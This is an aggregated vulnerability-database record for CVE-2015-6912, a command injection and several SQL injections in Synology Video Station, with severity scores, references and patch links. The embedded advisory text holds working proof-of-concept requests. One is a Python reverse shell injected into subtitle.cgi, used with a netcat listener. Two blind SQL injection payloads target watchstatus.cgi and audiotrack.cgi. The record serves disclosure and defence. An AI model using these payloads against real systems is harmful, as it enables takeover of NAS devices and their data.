Details of VAR-201509-0204

ID

VAR-201509-0204

CVE

CVE-2015-6912

TITLE

Synology Video Station In any shell Command execution vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2015-004689

DESCRIPTION

Synology Video Station before 1.5-0763 allows remote attackers to execute arbitrary shell commands via shell metacharacters in the subtitle_codepage parameter to subtitle.cgi. Supplementary information : CWE Vulnerability type by CWE-77: Improper Neutralization of Special Elements used in a Command ( Command injection ) Has been identified. Synology Video Station is a video manager from Synology. The vulnerability is caused by the fact that the subtitle.cgi file does not adequately filter shell metacharacters in the 'subtitle_codepage' parameter. In addition, Video Station is affected by multiple SQL injection vulnerabilities that allows for execution of arbitrary SQL statements with DBA privileges. As a result it is possible to compromise the PostgreSQL database server. ------------------------------------------------------------------------ Affected versions ------------------------------------------------------------------------ These issues affect Synology Video Station version up to and including version 1.5-0757. The script subtitle.cgi can also be called when the 'public share' option is enabled. With this option enabled, this issue can also be exploited by an unauthenticated remote attacker. This vulnerability can be used to compromise a Synology DiskStation NAS, including all data stored on the NAS, and the NAS as stepping stone to attack other systems. - Start netcat on attacker's system: nc -nvlp 80 - Submit the following request (change the IP - 192.168.1.20 - & port number - 80): GET /webapi/VideoStation/subtitle.cgi?id=193&api=SYNO.VideoStation.Subtitle&method=get&version=2&subtitle_id=%2Fvolume1%2Fvideo%2Fmr.robot.s01e10.720p.hdtv.x264-killers.nfo%2FMr.Robot.S01E10.720p.HDTV.x264-KILLERS.2aafa5c.eng.srt&subtitle_codepage=auto%26python%20-c%20'import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.1.20%22,80));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5b%22/bin/sh%22,%22-i%22%5d);'%26&preview=false&sharing_id=kSiNy0Pp HTTP/1.1 Host: 192.168.1.13:5000 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: keep-alive Pragma: no-cache Cache-Control: no-cache SQL injection vulnerability in watchstatus.cgi A (blind) SQL injection vulnerability exists in the watchstatus.cgi CGI script. This issue exists in the code handling the 'id' parameter and allows an attacker to execute arbitrary SQL statements with DBA privileges. As a result it is possible to compromise the PostgreSQL database server. In the following screenshot this issue is exploited using sqlmap. Proof of concept POST /webapi/VideoStation/watchstatus.cgi HTTP/1.1 Host: 192.168.1.13:5000 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-SYNO-TOKEN: Lq6mE9ANV2egU X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 80 Cookie: stay_login=0; id=Lq5QWGqg7Rnzc13A0LTN001710; jwplayer.volume=50 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache id=15076178770%20or%204864%3d4864--%20&position=10.05&api=SYNO.VideoStation.WatchStatus&method=setinfo&version=1 It should be noted that the X-SYNO-TOKEN header provides protection against Cross-Site Request Forgery attacks. As of DSM version 5.2-5592 Update 3, this protection is enabled by default. SQL injection vulnerability in audiotrack.cgi A (blind) SQL injection vulnerability exists in the audiotrack.cgi CGI script. This issue exists in the code handling the 'id' parameter and allows an attacker to execute arbitrary SQL statements with DBA privileges. As a result it is possible to compromise the PostgreSQL database server. Proof of concept POST /webapi/VideoStation/audiotrack.cgi HTTP/1.1 Content-Length: 294 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-SYNO-TOKEN: 7IKJdJMa8cutE Host: <hostname>:5000 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Connection: close Pragma: no-cache Cache-Control: no-cache X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: stay_login=0; id=7IivlxDM9MFb213A0LTN001710 id=1%20AND%20%28SELECT%20%28CASE%20WHEN%20%28%28SELECT%20usesuper%3Dtrue%20FROM%20pg_user%20WHERE%20usename%3DCURRENT_USER%20OFFSET%200%20LIMIT%201%29%29%20THEN%20%28CHR%2849%29%29%20ELSE%20%28CHR%2848%29%29%20END%29%29%3D%28CHR%2849%29%29&api=SYNO.VideoStation.AudioTrack&method=list&version=1

Trust: 1.89

sources: NVD: CVE-2015-6912 // JVNDB: JVNDB-2015-004689 // VULHUB: VHN-84873 // VULMON: CVE-2015-6912 // PACKETSTORM: 133519

AFFECTED PRODUCTS

vendor:	synology	model:	video station	scope:	lte	version:	1.5-0757	Trust: 1.0
vendor:	synology	model:	video station	scope:	lt	version:	1.5-0763	Trust: 0.8
vendor:	synology	model:	video station	scope:	eq	version:	1.5-0757	Trust: 0.6

sources: JVNDB: JVNDB-2015-004689 // CNNVD: CNNVD-201509-152 // NVD: CVE-2015-6912

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2015-6912
value:	HIGH
Trust: 1.0
NVD:	CVE-2015-6912
value:	HIGH
Trust: 0.8
CNNVD:	CNNVD-201509-152
value:	CRITICAL
Trust: 0.6
VULHUB:	VHN-84873
value:	HIGH
Trust: 0.1
VULMON:	CVE-2015-6912
value:	HIGH
Trust: 0.1

nvd@nist.gov:	CVE-2015-6912
severity:	HIGH
baseScore:	10.0
vectorString:	AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	COMPLETE
integrityImpact:	COMPLETE
availabilityImpact:	COMPLETE
exploitabilityScore:	10.0
impactScore:	10.0
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.9
VULHUB:	VHN-84873
severity:	HIGH
baseScore:	10.0
vectorString:	AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	COMPLETE
integrityImpact:	COMPLETE
availabilityImpact:	COMPLETE
exploitabilityScore:	10.0
impactScore:	10.0
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

sources: VULHUB: VHN-84873 // VULMON: CVE-2015-6912 // JVNDB: JVNDB-2015-004689 // CNNVD: CNNVD-201509-152 // NVD: CVE-2015-6912

PROBLEMTYPE DATA

problemtype:	CWE-77	Trust: 1.1
problemtype:	CWE-Other	Trust: 0.8

sources: VULHUB: VHN-84873 // JVNDB: JVNDB-2015-004689 // NVD: CVE-2015-6912

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 133519 // CNNVD: CNNVD-201509-152

TYPE

input validation

Trust: 0.6

sources: CNNVD: CNNVD-201509-152

CONFIGURATIONS

sources: JVNDB: JVNDB-2015-004689

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-84873 // VULMON: CVE-2015-6912

PATCH

title:

Release Notes for Video Station

url:

https://www.synology.com/en-global/releaseNote/VideoStation?model=DS715

Trust: 0.8

sources: JVNDB: JVNDB-2015-004689

EXTERNAL IDS

db:	NVD	id:	CVE-2015-6912	Trust: 2.6
db:	PACKETSTORM	id:	133519	Trust: 1.9
db:	JVNDB	id:	JVNDB-2015-004689	Trust: 0.8
db:	CNNVD	id:	CNNVD-201509-152	Trust: 0.7
db:	EXPLOIT-DB	id:	38128	Trust: 0.2
db:	VULHUB	id:	VHN-84873	Trust: 0.1
db:	VULMON	id:	CVE-2015-6912	Trust: 0.1

sources: VULHUB: VHN-84873 // VULMON: CVE-2015-6912 // JVNDB: JVNDB-2015-004689 // PACKETSTORM: 133519 // CNNVD: CNNVD-201509-152 // NVD: CVE-2015-6912

REFERENCES

url:	https://www.synology.com/en-global/releasenote/videostation?model=ds715	Trust: 1.8
url:	http://seclists.org/fulldisclosure/2015/sep/31	Trust: 1.8
url:	http://packetstormsecurity.com/files/133519/synology-video-station-1.5-0757-command-injection-sql-injection.html	Trust: 1.8
url:	https://www.securify.nl/advisory/sfy20150810/synology_video_station_command_injection_and_multiple_sql_injection_vulnerabilities.html	Trust: 1.8
url:	http://www.securityfocus.com/archive/1/536427/100/0/threaded	Trust: 1.2
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-6912	Trust: 0.8
url:	http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-6912	Trust: 0.8
url:	http://www.securityfocus.com/archive/1/archive/1/536427/100/0/threaded	Trust: 0.6
url:	https://cwe.mitre.org/data/definitions/77.html	Trust: 0.1
url:	https://nvd.nist.gov	Trust: 0.1
url:	https://www.exploit-db.com/exploits/38128/	Trust: 0.1

sources: VULHUB: VHN-84873 // VULMON: CVE-2015-6912 // JVNDB: JVNDB-2015-004689 // CNNVD: CNNVD-201509-152 // NVD: CVE-2015-6912

CREDITS

Securify B.V., Han Sahin

Trust: 0.1

sources: PACKETSTORM: 133519

SOURCES

db:	VULHUB	id:	VHN-84873
db:	VULMON	id:	CVE-2015-6912
db:	JVNDB	id:	JVNDB-2015-004689
db:	PACKETSTORM	id:	133519
db:	CNNVD	id:	CNNVD-201509-152
db:	NVD	id:	CVE-2015-6912

LAST UPDATE DATE

2025-04-13T23:18:04.061000+00:00

SOURCES UPDATE DATE

db:	VULHUB	id:	VHN-84873	date:	2018-10-09T00:00:00
db:	VULMON	id:	CVE-2015-6912	date:	2018-10-09T00:00:00
db:	JVNDB	id:	JVNDB-2015-004689	date:	2015-09-15T00:00:00
db:	CNNVD	id:	CNNVD-201509-152	date:	2015-09-14T00:00:00
db:	NVD	id:	CVE-2015-6912	date:	2025-04-12T10:46:40.837

SOURCES RELEASE DATE

db:	VULHUB	id:	VHN-84873	date:	2015-09-11T00:00:00
db:	VULMON	id:	CVE-2015-6912	date:	2015-09-11T00:00:00
db:	JVNDB	id:	JVNDB-2015-004689	date:	2015-09-15T00:00:00
db:	PACKETSTORM	id:	133519	date:	2015-09-10T00:05:25
db:	CNNVD	id:	CNNVD-201509-152	date:	2015-09-14T00:00:00
db:	NVD	id:	CVE-2015-6912	date:	2015-09-11T16:59:18.707